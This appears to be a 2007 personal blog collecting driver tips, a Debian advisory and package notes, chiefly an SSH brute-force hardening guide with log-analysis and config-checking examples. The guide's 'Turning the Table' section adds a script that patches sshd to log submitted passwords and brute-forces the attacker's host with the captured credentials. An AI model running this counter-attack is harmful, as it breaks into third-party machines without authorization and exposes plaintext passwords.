|
Prologue "The cradle of Russia stands in the bloody mire of Muscovite slavery, not in the stern glory of the Norman epoch. Change the names and dates, and we see that the policy of Ivan III and the policy of the modern Muscovite empire are not merely similar but identical... Russia was begotten and raised in the vile and abject school of Mongol slavery. It became strong only because it was unsurpassed in the craft of slavery. Even when Russia became independent, it remained a country of slaves. Peter I combined the political cunning of the Mongol slave with the grandeur of the Mongol ruler to whom Genghis Khan bequeathed the conquest of the world... Russia's policy is unchanging. Russian methods and tactics have changed and will change, but the main aim of Russian policy, to conquer the world and rule it, is and will remain unchanged. "Muscovite Pan-Slavism is merely one of the forms of conquest". Karl Marx |
|
Just check out http://www.laptopvideo2go.com/ and download the latest driver. Don't forget to download their modded inf as well. After unpacking the driver, copy the modded inf into the installation directory and run setup.exe.
http://www.techpowerup.com/downloads/765g/163.71_forceware_winxp_32bit_english_whql.exe |
| » nonstop dance |

17 Oct, 2007 @ 13:27
|
| » Цыферъ |

16 Oct, 2007 @ 15:02
|
| » Virtual Hitman Design |
› TELEVISION RULES THE NATION

source vhm: vhm at deviantart
14 Oct, 2007 @ 18:17
|
| » Sand Storm in Iraq |

14 Oct, 2007 @ 16:55
|
| » wondershaper |
Package: wondershaper (1.1a-4ubuntu1) [universe]
Easy to use traffic shaping script

An easy to use traffic shaping script that provides these improvements:
* Low latency for interactive traffic (and pings) at all times
* Allow websurfing at reasonable speeds while uploading / downloading
* Make sure uploads don't hurt downloads
* Make sure downloads don't hurt uploads

It does this by:
* Limiting upload speed slightly, to eliminate queues
* Limiting download speed, while allowing bursts, to eliminate queues
* Interactive traffic skips the queue
* ACKs and tiny packets skip the queue

Configuring the wondershaper requires you to accurately and precisely determine your consistent upload and download speeds.
The wondershaper is the simplest, easiest to use, entry level, traffic shaping script provided by Debian.
After installing this package, read the highly detailed instructions: /usr/share/doc/wondershaper/README.Debian
6 Oct, 2007 @ 21:48
|
| » Quagga |
------------------------------------------------------------------------
Debian Security Advisory DSA 1379-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
October 1st, 2007                     http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : quagga
Vulnerability  : null pointer dereference
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2007-4826
Debian Bug     : 442133
It was discovered that BGP peers can trigger a NULL pointer dereference in the BGP daemon if debug logging is enabled, causing the BGP daemon to crash.
For the old stable distribution (sarge), this problem has been fixed in version 0.98.3-7.5.
For the stable distribution (etch), this problem has been fixed in version 0.99.5-5etch3.
For the unstable distribution (sid), this problem has been fixed in version 0.99.9-1.
We recommend that you upgrade your quagga packages.
Upgrade instructions
--------------------

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
These files will probably be moved into the stable distribution on its next update.
---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
6 Oct, 2007 @ 21:45
|
| » SSH vs Script Kiddies How-to Guide |
Scope
Some idiot created a SSH worm that uses a dictionary attack to try to log into a computer over port 22. The worm tries to set up shop on your computer and tries to find the next vulnerable computer. This clogs up networks with bazillions of SSH login attempts.
A number of people created scripts that scan the system log files to identify the IP addresses of attackers and block them using either TcpWrappers or Netfilter. The problem with these approaches is that they consume local computer resources. They also create the risk that you can lock yourself out accidentally - maybe not a problem if the computer is in the next room, but it is a serious concern if the computer is far away on the other side of the globe.
Another solution is to set SSHD to use a different port. This will work, till the attacker adds a port scanner to his worm.
What is needed is a simple solution that consumes the resources of the attacker instead of your own. This little guide shows how to slow down SSH password authentication to accomplish this in a single line of code. This simple modification has been proven to completely defeat the attack, as discussed below.

Get It
You can get the SSH source code from the project pages at http://www.openssh.org. Download and store it somewhere, then make a small one line change and compile.
First we have to ensure that it will in fact compile and sort out any missing dependencies:
    $ tar -zxvf open[tab]
    $ cd open[tab]
    $ ./configure --prefix=/usr --sysconfdir=/etc/ssh
    $ make

If you are running Mandriva, then you should not have any issues, but SSH depends on the SSL library, so you have to do a test compile and fix any issues that crop up.

Hack It
The solution is to slow down password logins, but not affect public key logins. This way, if you are using public keys, login is immediate, while if someone uses password logins, he would have to wait a few seconds. This is not a problem to a person hammering away at the keyboard, but it will slow down an automated dictionary attack enormously.
Edit the file auth-passwd.c and add the single line 'sleep(10);' to it, immediately after the variable definitions:
    int
    auth_password(Authctxt *authctxt, const char *password)
    {
        struct passwd * pw = authctxt->pw;
        int result, ok = authctxt->valid;
    #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
        static int expire_checked = 0;
    #endif

        /* Password authentication delay */
        sleep(10);
The sleep() function allows the system to schedule other activity and come back a few seconds later. Therefore, this is an efficient way to waste someone else's time.
Now recompile and install, then restart sshd and test the new super slow password login:
    $ make
    $ su
    password
    # make install
    # service sshd restart
    # exit

    $ ssh localhost
    password
    ...long time passes...

Now you are the proud operator of an official Skr1pt K1dd13 T0rtur3 Mach1n3...

Compile Problems
If you have an older system and you have multiple versions of SSL installed, then compiling SSH may be a rather traumatic experience. I wanted to implement my fix on a Red Hat machine and had to spend a couple hours hacking away at it before it configured and compiled:
    #! /bin/bash
    # SSHD Compile and Install is just a wee bit problematic.
    # The following overrides for OpenSSL gets it going.
    # GCC says that the -R option is not recognized,
    # so I guess you can leave that out.
    # Anyhoo, this works...
    LDFLAGS="-I/usr/local/ssl/include -L/usr/local/ssl/lib -R/usr/local/ssl/lib"
    export LDFLAGS
    ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-ssl-dir=/usr/local/ssl
    make
    make install

Clearly, the trick is to play around with the various paths defined above, till you get it to work. Some trial and terror...

Results
The big question is of course: Does it work? It sure does.
Before the implementation of this simple one liner, a server could slow down to a crawl while it gets tens of thousands of login attempts, two or three times a day. Now it still gets two or three attacks a day, but the attackers give up after only eight attempts.
    # tail -n 10000 /var/log/secure | grep "password"

    Sep 7 12:05:34 ns sshd[13324]: Failed password for invalid user lpd from 61.17.77.2 port 60882 ssh2
    Sep 7 12:05:34 ns sshd[13322]: Failed password for invalid user lpd from 61.17.77.2 port 60811 ssh2
    Sep 7 12:05:34 ns sshd[13326]: Failed password for invalid user lpd from 61.17.77.2 port 60889 ssh2
    Sep 7 12:05:35 ns sshd[13328]: Failed password for invalid user lpd from 61.17.77.2 port 60893 ssh2
    Sep 7 12:05:35 ns sshd[13327]: Failed password for invalid user lpd from 61.17.77.2 port 60890 ssh2
    Sep 7 12:05:36 ns sshd[13329]: Failed password for invalid user lpd from 61.17.77.2 port 60894 ssh2
    Sep 7 12:05:37 ns sshd[13334]: Failed password for invalid user lpd from 61.17.77.2 port 60881 ssh2
    Sep 7 12:05:38 ns sshd[13336]: Failed password for invalid user lpd from 61.17.77.2 port 60896 ssh2

    Sep 7 15:05:46 ns sshd[14117]: Failed password for invalid user a from 211.219.20.245 port 1931 ssh2
    Sep 7 15:05:55 ns sshd[14119]: Failed password for invalid user a from 211.219.20.245 port 2371 ssh2
    Sep 7 15:06:06 ns sshd[14121]: Failed password for invalid user a from 211.219.20.245 port 2805 ssh2
    Sep 7 15:06:15 ns sshd[14123]: Failed password for invalid user a from 211.219.20.245 port 3255 ssh2
    Sep 7 15:06:23 ns sshd[14125]: Failed password for invalid user a from 211.219.20.245 port 3573 ssh2
    Sep 7 15:06:26 ns sshd[14127]: Failed password for invalid user a from 211.219.20.245 port 3692 ssh2
    Sep 7 15:06:33 ns sshd[14129]: Failed password for invalid user a from 211.219.20.245 port 4011 ssh2
    Sep 7 15:06:36 ns sshd[14131]: Failed password for invalid user a from 211.219.20.245 port 4137 ssh2
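An added example (not part of the original guide): a short Python script that groups the `Failed password` lines quoted above by source address and reports attempts, connections and timing, so the "gives up after eight attempts" pattern can be checked mechanically. The function names and the five-attempt threshold are assumptions of this example, and the excerpt is assumed to stay within one day.

```python
import re
from collections import defaultdict

# The sixteen sshd lines quoted in the guide, one per line.
SAMPLE_LOG = """\
Sep 7 12:05:34 ns sshd[13324]: Failed password for invalid user lpd from 61.17.77.2 port 60882 ssh2
Sep 7 12:05:34 ns sshd[13322]: Failed password for invalid user lpd from 61.17.77.2 port 60811 ssh2
Sep 7 12:05:34 ns sshd[13326]: Failed password for invalid user lpd from 61.17.77.2 port 60889 ssh2
Sep 7 12:05:35 ns sshd[13328]: Failed password for invalid user lpd from 61.17.77.2 port 60893 ssh2
Sep 7 12:05:35 ns sshd[13327]: Failed password for invalid user lpd from 61.17.77.2 port 60890 ssh2
Sep 7 12:05:36 ns sshd[13329]: Failed password for invalid user lpd from 61.17.77.2 port 60894 ssh2
Sep 7 12:05:37 ns sshd[13334]: Failed password for invalid user lpd from 61.17.77.2 port 60881 ssh2
Sep 7 12:05:38 ns sshd[13336]: Failed password for invalid user lpd from 61.17.77.2 port 60896 ssh2
Sep 7 15:05:46 ns sshd[14117]: Failed password for invalid user a from 211.219.20.245 port 1931 ssh2
Sep 7 15:05:55 ns sshd[14119]: Failed password for invalid user a from 211.219.20.245 port 2371 ssh2
Sep 7 15:06:06 ns sshd[14121]: Failed password for invalid user a from 211.219.20.245 port 2805 ssh2
Sep 7 15:06:15 ns sshd[14123]: Failed password for invalid user a from 211.219.20.245 port 3255 ssh2
Sep 7 15:06:23 ns sshd[14125]: Failed password for invalid user a from 211.219.20.245 port 3573 ssh2
Sep 7 15:06:26 ns sshd[14127]: Failed password for invalid user a from 211.219.20.245 port 3692 ssh2
Sep 7 15:06:33 ns sshd[14129]: Failed password for invalid user a from 211.219.20.245 port 4011 ssh2
Sep 7 15:06:36 ns sshd[14131]: Failed password for invalid user a from 211.219.20.245 port 4137 ssh2
"""

FAILED = re.compile(
    r"^\w{3}\s+\d+\s+(\d\d):(\d\d):(\d\d)\s+\S+\s+sshd\[(\d+)\]:\s+"
    r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")

def parse(log_text):
    """Yield (second_of_day, pid, user, source_ip) for each failed password."""
    for line in log_text.splitlines():
        m = FAILED.match(line.strip())
        if m:
            hh, mm, ss, pid, user, ip = m.groups()
            yield int(hh) * 3600 + int(mm) * 60 + int(ss), int(pid), user, ip

def summarize(log_text):
    """Group failures by source IP (assumes the excerpt stays within one day)."""
    by_ip = defaultdict(list)
    for rec in parse(log_text):
        by_ip[rec[3]].append(rec)
    report = {}
    for ip, recs in by_ip.items():
        times = sorted(r[0] for r in recs)
        gaps = [b - a for a, b in zip(times, times[1:])]
        report[ip] = {
            "attempts": len(recs),
            "connections": len({r[1] for r in recs}),  # one sshd PID per connection
            "users": sorted({r[2] for r in recs}),
            "span_s": times[-1] - times[0],
            "max_gap_s": max(gaps) if gaps else 0,
        }
    return report

def suspicious(report, min_attempts=5):
    """Sources with at least min_attempts failures (threshold is an assumption)."""
    return sorted(ip for ip, s in report.items() if s["attempts"] >= min_attempts)

if __name__ == "__main__":
    for ip, stats in summarize(SAMPLE_LOG).items():
        print(ip, stats)
```

On the quoted excerpt both sources show eight attempts over eight separate connections: the first arrives as one burst within 4 seconds, the second is spread over 50 seconds.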
These dictionary attacks are really lame, starting at 'a' for 'absolutely retarded', yet they do find servers to infect, showing just how many retarded sysadmins there are in the world...
The moral of the story? Use long user names and random passwords, or loooooong passphrases like 'ohmygodtheykilledkenny12345' or some such.
In general, throttling of network services is a very good way to limit abuse. A simple sleep delay added to any online form submission will prevent abuse, while regular users won't notice anything.

Analysis of the Attack Program
I have subsequently obtained copies of three of these attack scripts. I had to do some debugging to get them to work, but they all depend on libssh and all suffer from the same problems. Essentially, you feed the program an IP address, a list of usernames and passwords and let it go. It then does a complete permutation of the two lists.
One of the scripts is multi threaded, but libssh fails when more than eight threads are enabled. This explains why all attacks come in clumps of eight, since that is the highest number of threads that libssh can run.
It appears that the login timeout is hard coded in libssh and the 10 second sleep() that I have introduced causes libssh to fail on every login attempt. Therefore, this modification is very good and completely defeats the attack.

Other Configuration Improvements
The /etc/ssh/sshd_config file has a number of features that you can use for further protection. First of all, you could disallow all password logins and only rely on public keys, but make sure the public key login works, before disabling password login. You could also set a list of user names that are allowed to use ssh, thereby disallowing all common users, who may have bad quality passwords. Here are a few configuration items to think about:
    Port 2222
    Protocol 2
    PermitRootLogin no
    AllowUsers herman webmaster joesoap johndoe
    PasswordAuthentication no
Note that you can specify multiple ports and make sure that the new port works through the firewall, before you disable the default port:
    Port 22
    Port 2222
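An added example (not from the original guide): a Python check that reads an sshd_config the way sshd does and reports which of the items listed above are not in effect, which is useful to run before restarting sshd. It relies on the sshd_config rule that the first value given for a keyword is the one used, while Port and AllowUsers may be repeated; Match blocks are not evaluated, and the function names and the weak sample are constructed for this example.

```python
# Keywords that may be repeated; every other keyword keeps its first value.
REPEATABLE = {"port", "allowusers"}

# The settings suggested in the guide.
GUIDE_CONFIG = """\
Port 2222
Protocol 2
PermitRootLogin no
AllowUsers herman webmaster joesoap johndoe
PasswordAuthentication no
"""

# Constructed weak sample: the late "no" is ignored because the first value wins.
WEAK_CONFIG = """\
# constructed sample
Port 22
Protocol 2,1
PasswordAuthentication yes
PermitRootLogin yes
PasswordAuthentication no
"""

def effective_settings(config_text):
    """Global settings as sshd reads them (stops at the first Match block)."""
    settings = {}
    for raw in config_text.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue                      # blank line or comment
        key, args = parts[0].lower(), parts[1:]   # keywords are case-insensitive
        if key == "match":
            break                         # conditional blocks are out of scope here
        if key in REPEATABLE:
            settings.setdefault(key, []).extend(args)
        else:
            settings.setdefault(key, " ".join(args).lower())  # first value wins
    return settings

def audit(config_text):
    """Return findings for the hardening items the guide lists."""
    s = effective_settings(config_text)
    findings = []
    if s.get("passwordauthentication") != "no":
        findings.append("PasswordAuthentication is not 'no': passwords can still be guessed")
    if s.get("permitrootlogin") != "no":
        findings.append("PermitRootLogin is not 'no'")
    if "1" in s.get("protocol", "").split(","):
        findings.append("Protocol 1 is enabled")
    if not s.get("allowusers"):
        findings.append("AllowUsers is not set: no per-user allow list is in effect")
    return findings

if __name__ == "__main__":
    for name, text in (("guide", GUIDE_CONFIG), ("weak", WEAK_CONFIG)):
        print(name, audit(text) or "no findings")
```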
Change these things with care, since you can lock yourself out!

Turning the Table
This attack is guaranteed to be one on one. Therefore, it is easy to run sshd in debug mode and capture the attacking IP, Username and Password, then do a reverse attack on the originator. As it is very likely that the same script and attack vectors used against you, were also used to subvert the attacking machine, a reversal will eventually yield the login data of the attacker:
    #! /bin/bash
    # SSH Honeypot
    # This script reverses a SSH brute force attack onto the attacker.
    # The counter attack uses the same brute force script that the
    # attacker is running.
    # Assuming that the same data set was used to compromise the attacking
    # host, this will eventually yield the username and password of
    # the attacking host.

    # Modifications required to SSHD:
    # We need to make a small modification to SSHD to cause it to
    # reveal the password when running in debug mode.
    # Add the following line to auth-passwd.c, procedure auth_password():
    # debug("auth-passwd.c: Password %s ", password);
    # then recompile SSHD.

    # Forever
    while [ 1 -eq 1 ]
    do
      # Run SSHD in debug mode, single threaded
      data=`/usr/sbin/sshd -dDe 2>&1 | grep -A 2 "debug1: attempt 3"`

      # The $data looks like this:
      # data=$'debug1: attempt 3 failures 3\r\n
      # debug1: auth-passwd.c: Password hello \r\n
      # Failed password for root from 127.0.0.1 port 4199 ssh2\r'

      # Parse the string for the three parameters
      # The brute forcer wants some of these in files
      # so we echo them to files.
      pass=`echo $data | cut -d " " -f 9`
      echo $pass > pass
      user=`echo $data | cut -d " " -f 14`
      echo $user > user
      ip=`echo $data | cut -d " " -f 16`
      echo $ip > ip

      # Reverse the attack
      ./ssh2_brute -h $ip -u user -p pass -c 1

      # Check the result
      if [ $? -eq 1 ]
      then
        echo "ATTACKER FOUND:"
        echo IP=$ip, Username=$user, Password=$pass
        echo $ip $user $pass >> attackers
      fi

    done

    exit 0
Use IPTables to Limit Access
Instead of recompiling SSH, you can use the IPTables rate limit module to prevent abuse. Add the following lines to the bottom of /etc/rc.d/rc.local, to limit new login attempts to once per minute:
    iptables -A INPUT -p tcp -m state --syn --state NEW --dport ssh \
        -m limit --limit 1/minute --limit-burst 1 -j ACCEPT
    iptables -A INPUT -p tcp -m state --syn --state NEW --dport ssh -j DROP
That will defeat even the most patient hacker...
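An added example (not from the original guide): a simplified Python model of the `limit` match used in the rule above, replayed over constructed connection attempts. It shows a caveat of this rule: the `limit` match keeps one bucket for the whole rule, so a persistent scanner uses up the single new connection per minute and the administrator's own attempts are dropped as well, which is the lock-out risk raised in the Scope section. A per-source bucket, as the `hashlimit` match keeps in its srcip mode, is modelled for comparison. The addresses are documentation ranges and all names are assumptions of this example.

```python
from collections import defaultdict

class LimitBucket:
    """Simplified model of the iptables 'limit' match: integer credit in seconds."""
    def __init__(self, interval_s=60, burst=1):
        self.cost = interval_s            # one match costs one interval of credit
        self.cap = interval_s * burst     # --limit-burst caps the saved-up credit
        self.credit = self.cap            # the bucket starts full
        self.last = 0

    def allow(self, now):
        self.credit = min(self.cap, self.credit + (now - self.last))
        self.last = now
        if self.credit >= self.cost:
            self.credit -= self.cost
            return True                   # first rule matches: ACCEPT
        return False                      # falls through to the second rule: DROP

def replay(events, per_source):
    """events: iterable of (time_s, source). Returns accepted SYNs per source."""
    shared = LimitBucket()
    buckets = defaultdict(LimitBucket)
    accepted = defaultdict(int)
    for now, src in sorted(events):
        bucket = buckets[src] if per_source else shared
        accepted[src] += bucket.allow(now)
    return dict(accepted)

# Constructed traffic: a scanner sends one SYN every 5 s for 10 minutes,
# while an administrator tries to connect three times.
SCANNER, ADMIN = "198.51.100.7", "192.0.2.10"
EVENTS = [(t, SCANNER) for t in range(0, 600, 5)] + [(t, ADMIN) for t in (32, 97, 401)]

if __name__ == "__main__":
    print("shared bucket (rule as written):", replay(EVENTS, per_source=False))
    print("per-source buckets:             ", replay(EVENTS, per_source=True))
```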
La Voila!
1 Oct, 2007 @ 12:34
|
| » (No Subject) |
Welcome to Finnix for User Mode Linux!
[*] Running Linux kernel 2.6.14.2-finnix86.1-linode1 on i686
[*] Host: Linux host11.linode.com 2.6.11-1-bigmem64 #2 SMP Mon Mar 7 15:00:57 EST 2005 i686
[*] Scanning for partitions and creating /etc/fstab... done
[*] Using swap partition /dev/ubdb
[*] Starting background DHCP request... eth0
[*] Finnix version 86.1 ready; 346 packages available
INIT: Entering runlevel: 2
root@tty0:~#
21 Sept, 2007 @ 18:11
|
| » (No Subject) |
Domino-S, private enterprise
City: Lviv
Address: 73 Turgeneva St.
Phone: 8/032/ 239-30-10, 8/050/ 43-00-828
E-mail: domino-lviv mail.ru
www: www.domino-s.com.ua
Status: component supplier

Components:
* components (1. Kit for repairing damage on white PVC profile. 2. Professional kit for repairing damage on wooden and PVC profiles (in Ral and Renolit colours). 3. “Kanten Fix” markers (Ral, Renolit colours) for colouring joints, seams, etc.)
* surface repair and restoration products (Our company offers you professional products from the German company «Heinrich Konig & Co» for repairing damage on wooden and PVC profiles, as well as markers and paints for seams on PVC profiles in Renolit and RAL colours.)

Chinese Trade House, LLC
City: Kyiv
Address: 'Rent House' business centre, 7 Goloseevskaya St., bldg. 2, office 6/1
Phone: 8044-251-45-08, 8044-251-45-07
E-mail: grn ukr-china.com
www: www.china-tradehouse.com
Status: component supplier

Components:
* fittings/handles (aluminium and brown, eight-position, white, 35 and 40 mm pin. Price from 3.38 UAH)
* insulating glass units/glass (M0 float glass, size 3210x2134x4 mm, size 2600x1800x4 mm, quality guaranteed, cuts excellently, price from 15 UAH (incl. VAT))

SADEX, LLC
City: Kyiv
Address: 18 Pshenichnaya St.
Phone: (044) 501 40 16
E-mail: infosadex gmail.com
www: not specified
Status: component supplier

Components:
* fittings/handles (aluminium window handles (white, brown), made in China)
* installation/foam (professional mounting foam (made in Poland))
* components/reveals (self-adhesive plastic trim (made in Germany))
21 Sept, 2007 @ 18:02
|
| » 28082007(019) |


28 Aug, 2007 @ 19:20
|
| » Postfix SSL HOWTO |
|
This is an introduction to the use of TLS/SSL with the Postfix MTA. Using TLS can provide the user with a means to encrypt the mail connection and to encrypt plaintext authentication. Using TLS, you can also authenticate a user based on a private key to allow mail relaying.
27 May, 2007 @ 22:24
|
|